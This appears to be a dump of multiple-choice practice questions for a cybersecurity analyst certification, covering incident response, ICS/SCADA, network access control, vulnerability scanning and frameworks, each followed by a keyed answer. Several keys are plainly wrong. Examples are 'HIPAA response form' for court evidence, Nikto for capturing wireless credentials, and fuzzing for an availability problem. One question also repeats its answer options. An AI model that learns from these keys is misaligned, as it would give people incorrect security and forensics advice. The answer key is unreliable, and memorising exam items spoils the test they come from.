Guests using the wireless network should provide valid identification when registering their wireless devices.
A cyber-incident response team is responding to a network intrusion incident on a hospital network. Which of the following must the team prepare to allow the data to be used in court as evidence? Computer forensics form HIPAA response form Chain of custody form Incident form
HIPAA response form
An analyst has received unusual alerts on the SIEM dashboard. The analyst wants to get payloads that the hackers are sending toward the target systems without impacting the business operation. Which of the following should the analyst implement? Honeypot Jump box Sandboxing Virtualization
Honeypot
Which of the following organizations would have to remediate embedded controller vulnerabilities? Banking institutions Public universities Regulatory agencies Hydroelectric facilities
Hydroelectric facilities
A network technician is concerned that an attacker is attempting to penetrate the network, and wants to set a rule on the firewall to prevent the attacker from learning which IP addresses are valid on the network. Which of the following protocols needs to be denied? TCP SMTP ICMP ARP
ICMP
Which of the following BEST describes why vulnerabilities found in ICS and SCADA can be difficult to remediate? ICS/SCADA systems are not supported by the CVE publications. ICS/SCADA systems rarely have full security functionality. ICS/SCADA systems do not allow remote connections. ICS/SCADA systems use encrypted traffic to communicate between devices.
ICS/SCADA systems are not supported by the CVE publications.
A companys asset management software has been discovering a weekly increase in non-standard software installed on end users machines with duplicate license keys. The security analyst wants to know if any of this software is listening on any non-standard ports, such as 6667. Which of the following tools should the analyst recommend to block any command and control traffic? Netstat NIDS IPS HIDS
IPS
The Chief Information Security Officer (CISO) has asked the security staff to identify a framework on which to base the security program. The CISO would like to achieve a certification showing the security program meets all required best practices. Which of the following would be the BEST choice? OSSIM SDLC SANS ISO
ISO
A staff member reported that a laptop has degraded performance. The security analyst has investigated the issue and discovered that CPU utilization, memory utilization, and outbound network traffic are consuming the laptop resources. Which of the following is the BEST course of actions to resolve the problem? Identify and remove malicious processes. Disable scheduled tasks. Suspend virus scan. Increase laptop memory. Ensure the laptop OS is properly patched.
Identify and remove malicious processes.
An organization is requesting the development of a disaster recovery plan. The organization has grown and so has its infrastructure. Documentation, policies, and procedures do not exist. Which of the following steps should be taken to assist in the development of the disaster recovery plan? Conduct a risk assessment. Develop a data retention policy. Execute vulnerability scanning. Identify assets.
Identify assets.
While reviewing proxy logs, the security analyst noticed a suspicious traffic pattern. Several internal hosts were observed communicating with an external IP address over port 80 constantly. An incident was declared, and an investigation was launched. After interviewing the affected users, the analyst determined the activity started right after deploying a new graphic design suite. Based on this information, which of the following actions would be the appropriate NEXT step in the investigation? Update all antivirus and anti-malware products, as well as all other host-based security software on the servers the affected users authenticate to. Perform a network scan and identify rogue devices that may be generating the observed traffic. Remove those devices from the network. Identify what the destination IP address is and who owns it, and look at running processes on the affected hosts to determine if the activity is malicious or not. Ask desktop support personnel to reimage all affected workstations and reinstall the graphic design suite. Run a virus scan to identify if any viruses are present.
Identify what the destination IP address is and who owns it, and look at running processes on the affected hosts to determine if the activity is malicious or not.
A company has several internal-only, web-based applications on the internal network. Remote employees are allowed to connect to the internal corporate network with a companysupplied VPN client. During a project to upgrade the internal application, contractors were hired to work on a database server and were given copies of the VPN client so they could work remotely. A week later, a security analyst discovered an internal web-server had been compromised by malware that originated from one of the contractors laptops. Which of the following changes should be made to BEST counter the threat presented in this scenario? Create a restricted network segment for contractors, and set up a jump box for the contractors to use to access internal resources. Deploy a web application firewall in the DMZ to stop Internet-based attacks on the web server. Deploy an application layer firewall with network access control lists at the perimeter, and then create alerts for suspicious Layer 7 traffic. Require the contractors to bring their laptops on site when accessing the internal network instead of using the VPN from a remote location. Implement NAC to check for updated anti-malware signatures and location-based rules for PCs connecting to the internal network.
Implement NAC to check for updated anti-malware signatures and location-based rules for PCs connecting to the internal network.
While reviewing three months of logs, a security analyst notices probes from random company laptops going to SCADA equipment at the companys manufacturing location. Some of the probes are getting responses from the equipment even though firewall rules are in place, which should block this type of unauthorized activity. Which of the following should the analyst recommend to keep this activity from originating from company laptops? Implement a group policy on company systems to block access to SCADA networks. Require connections to the SCADA network to go through a forwarding proxy. Update the firewall rules to block SCADA network access from those laptop IP addresses. Install security software and a host-based firewall on the SCADA equipment.
Implement a group policy on company systems to block access to SCADA networks.
An organization has recently recovered from an incident where a managed switch had been accessed and reconfigured without authorization by an insider. The incident response team is working on developing a lessons learned report with ecommendations. Which of the following recommendations will BEST prevent the same attack from occurring in the future? Remove and replace the managed switch with an unmanaged one. Implement a separate logical network segment for management interfaces. Install and configure NAC services to allow only authorized devices to connect to the network. Analyze normal behavior on the network and configure the IDS to alert on deviations from normal.
Implement a separate logical network segment for management interfaces.
A cybersecurity analyst is reviewing the current BYOD security posture. The users must be able to synchronize their calendars, email, and contacts to a smartphone or other personal device. The recommendation must provide the most flexibility to users. Which of the following recommendations would meet both the mobile data protection efforts and the business requirements described in this scenario? Develop a minimum security baseline while restricting the type of data that can be accessed. Implement a single computer configured with USB access and monitored by sensors. Deploy a kiosk for synchronizing while using an access list of approved users. Implement a wireless network configured for mobile device access and monitored by sensors.
Implement a wireless network configured for mobile device access and monitored by sensors.
A security analyst with an international response team is working to isolate a worldwide distribution of ransomware. The analyst is working with international governing bodies to distribute advanced intrusion detection routines for this variant of ransomware. Which of the following is the MOST important step with which the security analyst should comply? Security operations privacy law Export restrictions Non-disclosure agreements Incident response forms
Incident response forms
A recently issued audit report highlighted exceptions related to end-user handling of sensitive data and access credentials. A security manager is addressing the findings. Which of the following activities should be implemented? Update the password policy Increase training requirements Deploy a single sign-on platform Deploy Group Policy Objects
Increase training requirements
A cybersecurity analyst has received a report that multiple systems are experiencing slowness as a result of a DDoS attack. Which of the following would be the BEST action for the cybersecurity analyst to perform? Continue monitoring critical systems. Shut down all server interfaces. Inform management of the incident. Inform users regarding the affected systems.
Inform management of the incident.
A web application has a newly discovered vulnerability in the authentication method used to validate known company users. The user ID of Admin with a password of password grants elevated access to the application over the Internet. Which of the following is the BEST method to discover the vulnerability before a production deployment? Manual peer review User acceptance testing Input validation Stress test the application
Input validation
During a web application vulnerability scan, it was discovered that the application would display inappropriate data after certain key phrases were entered into a webform connected to a SQL database server. Which of the following should be used to reduce the likelihood of this type of attack returning sensitive data? Static code analysis Peer review code Input validation Application fuzzing
Input validation
A security analyst is attempting to configure a vulnerability scan for a new segment on the network. Given the requirement to prevent credentials from traversing the network while still conducting a credentialed scan, which of the following is the BEST choice? Install agents on the endpoints to perform the scan Provide each endpoint with vulnerability scanner credentials Encrypt all of the traffic between the scanner and the endpoint Deploy scanners with administrator privileges on each endpoint
Install agents on the endpoints to perform the scan
A server contains baseline images that are deployed to sensitive workstations on a regular basis. The images are evaluated once per month for patching and other fixes, but do not change otherwise. Which of the following controls should be put in place to secure the file server and ensure the images are not changed? Install and configure a file integrity monitoring tool on the server and allow updates to the images each month. Schedule vulnerability scans of the server at least once per month before the images are updated. Require the use of two-factor authentication for any administrator or user who needs to connect to the server. Install a honeypot to identify any attacks before the baseline images can be compromised.
Install and configure a file integrity monitoring tool on the server and allow updates to the images each month.
A nuclear facility manager determined the need to monitor utilization of water within the facility. A startup company just announced a state-of-the-art solution to address the need for integrating the business and ICS network. The solution requires a very small agent to be installed on the ICS equipment. Which of the following is the MOST important security control for the manager to invest in to protect the facility? Run a penetration test on the installed agent. Require that the solution provider make the agent source code available for analysis. Require through guides for administrator and users. Install the agent for a week on a test system and monitor the activities.
Install the agent for a week on a test system and monitor the activities.
A threat intelligence analyst who works for an oil and gas company has received the following email from a superior: We will be connecting our IT network with our ICS. Our IT security has historically been top of the line, and this convergence will make the ICS easier to manage and troubleshoot. Can you please perform a risk/vulnerability assessment on this decision? Which of the following is MOST accurate regarding ICS in this scenario? Convergence decreases attack vectors Integrating increases the attack surface IT networks cannot be connected to ICS infrastructure Combined networks decrease efficiency
Integrating increases the attack surface
An analyst has initiated an assessment of an organizations security posture. As a part of this review, the analyst would like to determine how much information about the organization is exposed externally. Which of the following techniques would BEST help the analyst accomplish this goal? (Select two.) Fingerprinting DNS query log reviews Banner grabbing Internet searches Intranet portal reviews Sourcing social network sites Technical control audits
Internet searches Sourcing social network sites
A security analyst has discovered that an outbound SFTP process is occurring at the same time of day for the past several days. At the time this was discovered, large amounts of business critical data were delivered. The authentication for this process occurred using a service account with proper credentials. The security analyst investigated the destination IP for this transfer and discovered that this new process is not documented in the change management log. Which of the following would be the BEST course of action for the analyst to take? Investigate a potential incident. Verify user permissions. Run a vulnerability scan. Verify SLA with cloud provider.
Investigate a potential incident.
A zero-day crypto-worm is quickly spreading through the internal network on port 25 and exploiting a software vulnerability found within the email servers. Which of the following countermeasures needs to be implemented as soon as possible to mitigate the worm from continuing to spread? Implement a traffic sinkhole. Block all known port/services. Isolate impacted servers. Patch affected systems.
Isolate impacted servers.
A corporation employs a number of small-form-factor workstations and mobile devices, and an incident response team is therefore required to build a forensics kit with tools to support chip-off analysis. Which of the following tools would BEST meet this requirement? JTAG adapters Last-level cache readers Write-blockers ZIF adapters
JTAG adapters
A security analyst is assisting in the redesign of a network to make it more secure. The solution should be low cost, and access to the secure segments should be easily monitored, secured, and controlled. Which of the following should be implemented? System isolation Honeyport Jump box Mandatory access control
Jump box
Management is concerned with administrator access from outside the network to a key server in the company. Specifically, firewall rules allow access to the server from anywhere in the company. Which of the following would be an effective solution? Honeypot Jump box Server hardening Anti-malware
Jump box
A security analyst is concerned that unauthorized users can access confidential data stored in the production server environment. All workstations on a particular network segment have full access to any server in production. Which of the following should be deployed in the production environment to prevent unauthorized access? (Choose two.) DLP system Honeypot Jump box IPS Firewall
Jump box Firewall
Which of the following stakeholders would need to be aware of an e-discovery notice received by the security office about an ongoing case within the manufacturing department? Board of trustees Human resources Legal Marketing
Legal
A security analyst discovers a network intrusion and quickly solves the problem by closing an unused port. Which of the following should be completed? Vulnerability report Memorandum of agreement Reverse-engineering incident report Lessons learned report
Lessons learned report
Which of the following actions should occur to address any open issues while closing an incident involving various departments within the network? Incident response plan Lessons learned report Reverse engineering process Chain of custody documentation
Lessons learned report
Which of the following items represents a document that includes detailed information on when an incident was detected, how impactful the incident was, and how it was remediated, in addition to incident response effectiveness and any identified gaps needing improvement? Forensic analysis report Chain of custody report Trends analysis report Lessons learned report
Lessons learned report
During a physical penetration test at a client site, a local law enforcement officer stumbled upon the test questioned the legitimacy of the team. Which of the following information should be shown to the officer? Letter of engagement Scope of work Timing information Team reporting
Letter of engagement
A security analyst at a small regional bank has received an alert that nation states are attempting to infiltrate financial institutions via phishing campaigns. Which of the following techniques should the analyst recommend as a proactive measure to defend against this type of threat? Honeypot Location-based NAC System isolation Mandatory access control Bastion host
Location-based NAC
A security administrator determines several months after the first instance that a local privileged user has been routinely logging into a server interactively as root and browsing the Internet. The administrator determines this by performing an annual review of the security logs on that server. For which of the following security architecture areas should the administrator recommend review and modification? (Select TWO). Log aggregation and analysis Software assurance Encryption Acceptable use policies Password complexity Network isolation and separation
Log aggregation and analysis Acceptable use policies
A worm was detected on multiple PCs within the remote office. The security analyst recommended that the remote office be blocked from the corporate network during the incident response. Which of the following processes BEST describes this recommendation? Logical isolation of the remote office Sanitization of the network environment Segmentation of the network Secure disposal of affected systems
Logical isolation of the remote office
A technician at a companys retail store notifies an analyst that disk space is being consumed at a rapid rate on several registers. The uplink back to the corporate office is also saturated frequently. The retail location has no Internet access. An analyst then observes several occasional IPS alerts indicating a server at corporate has been communicating with an address on a watchlist. Netflow data shows large quantities of data transferred at those times. Which of the following is MOST likely causing the issue? A credit card processing file was declined by the card processor and caused transaction logs on the registers to accumulate longer than usual. Ransomware on the corporate network has propagated from the corporate network to the registers and has begun encrypting files there. A penetration test is being run against the registers from the IP address indicated on the watchlist, generating large amounts of traffic and data storage. Malware on a register is scraping credit card data and staging it on a server at the corporate office before uploading it to an attacker-controlled command and control server.
Malware on a register is scraping credit card data and staging it on a server at the corporate office before uploading it to an attacker-controlled command and control server.
A network administrator is attempting to troubleshoot an issue regarding certificates on a secure website. During the troubleshooting process, the network administrator notices that the web gateway proxy on the local network has signed all of the certificates on the local machine. Which of the following describes the type of attack the proxy has been legitimately programmed to perform? Transitive access Spoofing Man-in-the-middle Replay
Man-in-the-middle
A technician recently fixed a computer with several viruses and spyware programs on it and notices the Internet settings were set to redirect all traffic through an unknown proxy. This type of attack is known as which of the following? Phishing Social engineering Man-in-the-middle Shoulder surfing
Man-in-the-middle
A corporation has implemented an 802.1X wireless network using self-signed certificates. Which of the following represents a risk to wireless users? Buffer overflow attacks Cross-site scripting attacks Man-in-the-middle attacks Denial of service attacks
Man-in-the-middle attacks
During the forensic a phase of a security investigation, it was discovered that an attacker was able to find private keys on a poorly secured team shared drive. The attacker used those keys to intercept and decrypt sensitive traffic on a web server. Which of the following describes this type of exploit and the potential remediation? Session hijacking; network intrusion detection sensors Cross-site scripting; increased encryption key sizes Man-in-the-middle; well-controlled storage of private keys Rootkit; controlled storage of public keys
Man-in-the-middle; well-controlled storage of private keys
During a tabletop exercise, it is determined that a security analyst is required to ensure patching and scan reports are available during an incident, as well as documentation of all critical systems. To which of the following stakeholders should the analyst provide the reports? Management Affected vendors Security operations Legal
Management
A logistics companys vulnerability scan identifies the following vulnerabilities on Internet-facing devices in the DMZ: SQL injection on an infrequently used web server that provides files to vendors SSL/TLS not used for a website that contains promotional information The scan also shows the following vulnerabilities on internal resources: Microsoft Office Remote Code Execution on test server for a human resources system TLS downgrade vulnerability on a server in a development network In order of risk, which of the following should be patched FIRST? Microsoft Office Remote Code Execution SQL injection SSL/TLS not used TLS downgrade
Microsoft Office Remote Code Execution
On which of the following organizational resources is the lack of an enabled password or PIN a common vulnerability? VDI systems Mobile devices Enterprise server Oss VPNs VoIP phones
Mobile devices
A company uses a managed IDS system, and a security analyst has noticed a large volume of brute force password attacks originating from a single IP address. The analyst put in a ticket with the IDS provider, but no action was taken for 24 hours, and the attacks continued. Which of the following would be the BEST approach for the scenario described? Draft a new MOU to include response incentive fees. Reengineer the BPA to meet the organizations needs. Modify the SLA to support organizational requirements. Implement an MOA to improve vendor responsiveness.
Modify the SLA to support organizational requirements.
A cybersecurity analyst is hired to review the security measures implemented within the domain controllers of a company. Upon review, the cybersecurity analyst notices a brute force attack can be launched against domain controllers that run on a Windows platform. The first remediation step implemented by the cybersecurity analyst is to make the account passwords more complex. Which of the following is the NEXT remediation step the cybersecurity analyst needs to implement? Disable the ability to store a LAN manager hash. Deploy a vulnerability scanner tool. Install a different antivirus software. Perform more frequent port scanning. Move administrator accounts to a new security group.
Move administrator accounts to a new security group.
Malicious users utilized brute force to access a system. An analyst is investigating these attacks and recommends methods to management that would help secure the system. Which of the following controls should the analyst recommend? (Choose three.) Multifactor authentication Network segmentation Single sign-on Encryption Complexity policy Biometrics Obfuscation
Multifactor authentication Complexity policy Biometrics
A security analyst is making recommendations for securing access to the new forensic workstation and workspace. Which of the following security measures should the analyst recommend to protect access to forensic data? Multifactor authentication Polarized lens protection Physical workspace isolation Secure ID token Security reviews of the system at least yearly Polarized lens protection Bright lightning in all access areas Security reviews of the system at least yearly Multifactor authentication Two-factor authentication into the building Separation of duties Warning signs placed in clear view
Multifactor authentication Polarized lens protection Physical workspace isolation
An incident response report indicates a virus was introduced through a remote host that was connected to corporate resources. A cybersecurity analyst has been asked for a recommendation to solve this issue. Which of the following should be applied? MAC TAP NAC ACL
NAC
Company A permits visiting business partners from Company B to utilize Ethernet ports available in Company As conference rooms. This access is provided to allow partners the ability to establish VPNs back to Company Bs network. The security architect for Company A wants to ensure partners from Company B are able to gain direct Internet access from available ports only, while Company A employees can gain access to the Company A internal network from those same ports. Which of the following can be employed to allow this? ACL SIEM MAC NAC SAML
NAC
A Chief Information Security Officer (CISO) wants to standardize the companys security program so it can be objectively assessed as part of an upcoming audit requested by management. Which of the following would holistically assist in this effort? ITIL NIST Scrum AUP Nessus
NIST
The Chief Executive Officer (CEO) instructed the new Chief Information Security Officer (CISO) to provide a list of enhancement to the companys cybersecurity operation. As a result, the CISO has identified the need to align security operations with industry best practices. Which of the following industry references is appropriate to accomplish this? OSSIM NIST PCI OWASP
NIST
Due to new regulations, a company has decided to institute an organizational vulnerability management program and assign the function to the security team. Which of the following frameworks would BEST support the program? (Choose two.) COBIT NIST ISO 27000 series ITIL COSO
NIST ITIL
Due to new regulations, a company has decided to institute an organizational vulnerability management program and assign the function to the security team. Which of the following frameworks would BEST support the program? (Select two.) COBIT NIST ISO 27000 series ITIL OWASP
NIST ITIL
An organization is experiencing degradation of critical services and availability of critical external resources. Which of the following can be used to investigate the issue? Netflow analysis Behavioral analysis Vulnerability analysis Risk analysis
Netflow analysis
A malicious hacker wants to gather guest credentials on a hotel 802.11 network. Which of the following tools is the malicious hacker going to use to gain access to information found on the hotel network? Nikto Aircrak-ng Nessus tcpdump
Nikto
An organization has recently experienced a data breach. A forensic analysis confirmed the attacker found a legacy web server that had not been used in over a year and was not regularly patched. After a discussion with the security team, management decided to initiate a program of network reconnaissance and penetration testing. They want to start the process by scanning the network for active hosts and open ports. Which of the following tools is BEST suited for this job? Ping Nmap Netstat ifconfig Wireshark L0phtCrack
Nmap
Considering confidentiality and integrity, which of the following make servers more secure than desktops? (Select THREE). VLANs OS Trained operators Physical access restriction Processing power Hard drive capacity
OS Trained operators Physical access restriction
A security analyst receives a mobile device with symptoms of a virus infection. The virus is morphing whenever it is from sandbox to sandbox to analyze. Which of the following will help to identify the number of variations through the analysis life cycle? Journaling Hashing utilities Log viewers OS and process analysis
OS and process analysis
The director of software development is concerned with recent web application security incidents, including the successful breach of a back-end database server. The director would like to work with the security team to implement a standardized way to design, build, and test web applications and the services that support them. Which of the following meets the criteria? OWASP SANS PHP Ajax
OWASP
An organization subscribes to multiple third-party security intelligence feeds. It receives a notification from one of these feeds indicating a zero-day malware attack is impacting the SQL server prior to SP 2. The notification also indicates that infected systems attempt to communicate to external IP addresses on port 2718 to download additional payload. After consulting with the organizations database administrator, it is determined that there are several SQL servers that are still on SP 1, and none of the SQL servers would normally communicate over port 2718. Which of the following is the BEST mitigation step to implement until the SQL servers can be upgraded to SP 2 with minimal impact to the network? Create alert rules on the IDS for all outbound traffic on port 2718 from the IP addresses if the SQL servers running SQL SP 1 On the organizations firewalls, create a new rule that blocks outbound traffic on port 2718 from the IP addresses of the servers running SQL SP 1 Place all the SQL servers running SP 1 on a separate subnet On the firewalls, create a new rule blocking connections to destination addresses external to the organizations network On the SQL servers running SP 1, install vulnerability scanning software
On the organizations firewalls, create a new rule that blocks outbound traffic on port 2718 from the IP addresses of the servers running SQL SP 1
Nmap scan results on a set of IP addresses returned one or more lines beginning with cpe:/o: followed by a company name, product name, and version. Which of the following would this string help an administrator to identify? Operating system Running services Installed software Installed hardware
Operating system
The security team has determined that the current incident response resources cannot meet managements objective to secure a forensic image for all serious security incidents within 24 hours. Which of the following compensating controls can be used to help meet managements expectations? Separation of duties Scheduled reviews Dual control Outsourcing
Outsourcing
A medical organization recently started accepting payments over the phone. The manager is concerned about the impact of the storage of different types of data. Which of the following types of data incurs the highest regulatory constraints? PHI PCI PII IP
PCI
An employee at an insurance company is processing claims that include patient addresses, clinic visits, diagnosis information, and prescription. While forwarding documentation to the supervisor, the employee accidentally sends the data to a personal email address outside of the company due to a typo. Which of the following types of data has been compromised? PCI Proprietary information Intellectual property PHI
PHI
During a routine review of firewall logs, an analyst identified that an IP address from the organizations server subnet had been connecting during nighttime hours to a foreign IP address, and had been sending between 150 and 500 megabytes of data each time. This had been going on for approximately one week, and the affected server was taken offline for forensic review. Which of the following is MOST likely to drive up the incidents impact assessment? PII of company employees and customers was exfiltrated. Raw financial information about the company was accessed. Forensic review of the server required fall-back on a less efficient service. IP addresses and other network-related configurations were exfiltrated. The local root password for the affected server was compromised.
PII of company employees and customers was exfiltrated.
A reverse engineer was analyzing malware found on a retailers network and found code extracting track data in memory. Which of the following threats did the engineer MOST likely uncover? POS malware Rootkit Key logger Ransomware
POS malware
An analyst has noticed unusual activities in the SIEM to a .cn domain name. Which of the following should the analyst use to identify the content of the traffic? Log review Service discovery Packet capture DNS harvesting
Packet capture
A user received an invalid password response when trying to change the password. Which of the following policies could explain why the password is invalid? Access control policy Account management policy Password policy Data ownership policy
Password policy
After an internal audit, it was determined that administrative logins need to use multifactor authentication or a 15-character key with complexity enabled. Which of the following policies should be updates to reflect this change? (Choose two.) Data ownership policy Password policy Data classification policy Data retention policy Acceptable use policy Account management policy
Password policy Account management policy
A security analyst performed a review of an organizations software development life cycle. The analyst reports that the life cycle does not contain in a phase in which team members evaluate and provide critical feedback on another developers code. Which of the following assessment techniques is BEST for describing the analysts report? Architectural evaluation Waterfall Whitebox testing Peer review
Peer review
The development team currently consists of three developers who each specialize in a specific programming language: Developer 1 C++/C# Developer 2 Python Developer 3 Assembly Which of the following SDLC best practices would be challenging to implement with the current available staff? Fuzzing Peer review Regression testing Stress testing
Peer review
An alert has been distributed throughout the information security community regarding a critical Apache vulnerability. Which of the following courses of action would ONLY identify the known vulnerability? Perform an unauthenticated vulnerability scan on all servers in the environment. Perform a scan for the specific vulnerability on all web servers. Perform a web vulnerability scan on all servers in the environment. Perform an authenticated scan on all web servers in the environment.
Perform a scan for the specific vulnerability on all web servers.
A company has established an ongoing vulnerability management program and procured the latest technology to support it. However, the program is failing because several vulnerabilities have not been detected. Which of the following will reduce the number of false negatives? Increase scan frequency. Perform credentialed scans. Update the security incident response plan. Reconfigure scanner to brute force mechanisms.
Perform credentialed scans.
The security operations team is conducting a mock forensics investigation. Which of the following should be the FIRST action taken after seizing a compromised workstation? Activate the escalation checklist Implement the incident response plan Analyze the forensic image Perform evidence acquisition
Perform evidence acquisition
A system is experiencing noticeably slow response times, and users are being locked out frequently. An analyst asked for the system security plan and found the system comprises two servers: an application server in the DMZ and a database server inside the trusted domain. Which of the following should be performed NEXT to investigate the availability issue? Review the firewall logs. Review syslogs from critical servers. Perform fuzzing. Install a WAF in front of the application server.
Perform fuzzing.
Law enforcement has contacted a corporations legal counsel because correlated data from a breach shows the organization as the common denominator from all indicators of compromise. An employee overhears the conversation between legal counsel and law enforcement, and then posts a comment about it on social media. The media then starts contacting other employees about the breach. Which of the following steps should be taken to prevent further disclosure of information about the breach? Perform security awareness training about incident communication. Request all employees verbally commit to an NDA about the breach. Temporarily disable employee access to social media Have law enforcement meet with employees.
Perform security awareness training about incident communication.
Which of the following is the MOST secure method to perform dynamic analysis of malware that can sense when it is in a virtual environment? Place the malware on an isolated virtual server disconnected from the network. Place the malware in a virtual server that is running Windows and is connected to the network. Place the malware on a virtual server connected to a VLAN. Place the malware on a virtual server running SIFT and begin analysis.
Place the malware on an isolated virtual server disconnected from the network.
A company discovers an unauthorized device accessing network resources through one of many network drops in a common area used by visitors. The company decides that it wants to quickly prevent unauthorized devices from accessing the network but policy prevents the company from making changes on every connecting client. Which of the following should the company implement? Port security WPA2 Mandatory Access Control Network Intrusion Prevention
Port security
During an investigation, a computer is being seized. Which of the following is the FIRST step the analyst should take? Power off the computer and remove it from the network. Unplug the network cable and take screenshots of the desktop. Perform a physical hard disk image. Initiate chain-of-custody documentation.
Power off the computer and remove it from the network.
A security analyst is concerned that employees may attempt to exfiltrate data prior to tendering their resignations. Unfortunately, the company cannot afford to purchase a data loss prevention (DLP) system. Which of the following recommendations should the security analyst make to provide defense-in-depth against data loss? (Select THREE). Prevent users from accessing personal email and file-sharing sites via web proxy Prevent flash drives from connecting to USB ports using Group Policy Prevent users from copying data from workstation to workstation Prevent users from using roaming profiles when changing workstations Prevent Internet access on laptops unless connected to the network in the office or via VPN Prevent users from being able to use the copy and paste functions
Prevent users from accessing personal email and file-sharing sites via web proxy Prevent flash drives from connecting to USB ports using Group Policy Prevent Internet access on laptops unless connected to the network in the office or via VPN
Employees at a manufacturing plant have been victims of spear phishing, but security solutions prevented further intrusions into the network. Which of the following is the MOST appropriate solution in this scenario? Continue to monitor security devices Update antivirus and malware definitions Provide security awareness training Migrate email services to a hosted environment
Provide security awareness training
A malicious user is reviewing the following output: root:~#ping 192.168.1.137 64 bytes from 192.168.2.1 icmp_seq=1 ttl=63 time=1.58 ms 64 bytes from 192.168.2.1 icmp_seq=2 ttl=63 time=1.45 ms root: ~# Based on the above output, which of the following is the device between the malicious user and the target? Proxy Access point Switch Hub
Proxy
A SIEM analyst noticed a spike in activities from the guest wireless network to several electronic health record (EHR) systems. After further analysis, the analyst discovered that a large volume of data has been uploaded to a cloud provider in the last six months. Which of the following actions should the analyst do FIRST? Contact the Office of Civil Rights (OCR) to report the breach Notify the Chief Privacy Officer (CPO) Activate the incident response plan Put an ACL on the gateway router
Put an ACL on the gateway router
Which of the following tools should an analyst use to scan for web server vulnerabilities? Wireshark Qualys ArcSight SolarWinds
Qualys
A company has decided to process credit card transactions directly. Which of the following would meet the requirements for scanning this type of data? Quarterly Yearly Bi-annually Monthly
Quarterly
An analyst was investigating the attack that took place on the network. A user was able to access the system without proper authentication. Which of the following will the analyst recommend, related to management approaches, in order to control access? (Choose three.) RBAC LEAP DAC PEAP MAC SCAP BCP
RBAC DAC MAC
While conducting research on malicious domains, a threat intelligence analyst received a blue screen of death. The analyst rebooted and received a message stating that the computer had been locked and could only be opened by following the instructions on the screen. Which of the following combinations describes the MOST likely threat and the PRIMARY mitigation for the threat? Ransomware and update antivirus Account takeover and data backups Ransomware and full disk encryption Ransomware and data backups
Ransomware and data backups
The new Chief Technology Officer (CTO) is seeking recommendations for network monitoring services for the local intranet. The CTO would like the capability to monitor all traffic to and from the gateway, as well as the capability to block certain content. Which of the following recommendations would meet the needs of the organization? Recommend setup of IP filtering on both the internal and external interfaces of the gateway router. Recommend installation of an IDS on the internal interface and a firewall on the external interface of the gateway router. Recommend installation of a firewall on the internal interface and a NIDS on the external interface of the gateway router. Recommend installation of an IPS on both the internal and external interfaces of the gateway router.
Recommend installation of a firewall on the internal interface and a NIDS on the external interface of the gateway router.
In order to meet regulatory compliance objectives for the storage of PHI, vulnerability scans must be conducted on a continuous basis. The last completed scan of the network returned 5,682 possible vulnerabilities. The Chief Information Officer (CIO) would like to establish a remediation plan to resolve all known issues. Which of the following is the BEST way to proceed? Attempt to identify all false positives and exceptions, and then resolve all remaining items. Hold off on additional scanning until the current list of vulnerabilities have been resolved. Place assets that handle PHI in a sandbox environment, and then resolve all vulnerabilities. Reduce the scan to items identified as critical in the asset inventory, and resolve these issues first.
Reduce the scan to items identified as critical in the asset inventory, and resolve these issues first.
A software patch has been released to remove vulnerabilities from companys software. A security analyst has been tasked with testing the software to ensure the vulnerabilities have been remediated and the application is still functioning properly. Which of the following tests should be performed NEXT? Fuzzing User acceptance testing Regression testing Penetration testing
Regression testing
A security analyst is performing ongoing scanning and continuous monitoring of the corporate datacenter. Over time, these scans are repeatedly showing susceptibility to the same vulnerabilities and an increase in new vulnerabilities on a specific group of servers that are clustered to run the same application. Which of the following vulnerability management processes should be implemented? Frequent server scanning Automated report generation Group policy modification Regular patch application
Regular patch application
An analyst reviews a recent report of vulnerabilities on a companys financial application server. Which of the following should the analyst rate as being of the HIGHEST importance to the companys environment? Banner grabbing Remote code execution SQL injection Use of old encryption algorithms Susceptibility to XSS
Remote code execution
Which of the following countermeasures should the security administrator apply to MOST effectively mitigate Bootkit-level infections of the organization's workstation devices? Remove local administrator privileges. Configure a BIOS-level password on the device. Install a secondary virus protection application. Enforce a system state recovery after each device reboot.
Remove local administrator privileges.
A security analyst received an alert from the antivirus software identifying a complex instance of malware on a companys network. The company does not have the resources to fully analyze the malware and determine its effect on the system. Which of the following is the BEST action to take in the incident recovery and post-incident response process? Wipe hard drives, reimage the systems, and return the affected systems to ready state. Detect and analyze the precursors and indicators; schedule a lessons learned meeting. Remove the malware and inappropriate materials; eradicate the incident. Perform event correlation; create a log retention policy.
Remove the malware and inappropriate materials; eradicate the incident.
The human resources division is moving all of its applications to an IaaS cloud. The Chief Information Officer (CIO) has asked the security architect to design the environment securely to prevent the IaaS provider from accessing its data-at-rest and data-in-transit within the infrastructure. Which of the following security controls should the security architect recommend? Implement a non-data breach agreement Ensure all backups are remote outside the control of the IaaS provider Ensure all of the IaaS providers workforce passes stringent background checks Render data unreadable through the use of appropriate tools and techniques
Render data unreadable through the use of appropriate tools and techniques
During a recent breach, an attacker was able to use tcpdump on a compromised Linux server to capture the password of a network administrator that logged into a switch using telnet. Which of the following compensating controls could be implemented to address this going forward? Whitelist tcpdump of Linux servers. Change the network administrator password to a more complex one. Implement separation of duties. Require SSH on network devices.
Require SSH on network devices.
Policy allows scanning of vulnerabilities during production hours, but production servers have been crashing lately due to unauthorized scans performed by junior technicians. Which of the following is the BEST solution to avoid production server downtime due to these types of scans? Transition from centralized to agent-based scans. Require vulnerability scans be performed by trained personnel. Configure daily-automated detailed vulnerability reports. Implement sandboxing to analyze the results of each scan. E. Scan only as required for regulatory compliance.
Require vulnerability scans be performed by trained personnel.
A security analyst wants to scan the network for active hosts. Which of the following host characteristics help to differentiate between a virtual and physical host? Reserved MACs Host IPs DNS routing tables Gateway settings
Reserved MACs
The board of directors made the decision to adopt a cloud-first strategy. The current security infrastructure was designed for on-premise implementation. A critical application that is subject to the Federal Information Security Management Act (FISMA) of 2002 compliance has been identified as a candidate for a hybrid cloud deployment model. Which of the following should be conducted FIRST? Develop a request for proposal. Perform a risk assessment. Review current security controls. Review the SLA for FISMA compliance.
Review current security controls.
Creating a lessons learned report following an incident will help an analyst to communicate which of the following information? (Select TWO) Root cause analysis of the incident and the impact it had on the organization Outline of the detailed reverse engineering steps for management to review Performance data from the impacted servers and endpoints to report to management Enhancements to the policies and practices that will improve business responses List of IP addresses, applications, and assets
Root cause analysis of the incident and the impact it had on the organization Enhancements to the policies and practices that will improve business responses
A company that is hiring a penetration tester wants to exclude social engineering from the list of authorized activities. Which of the following documents should include these details? Acceptable use policy Service level agreement Rules of engagement Memorandum of understanding Master service agreement
Rules of engagement
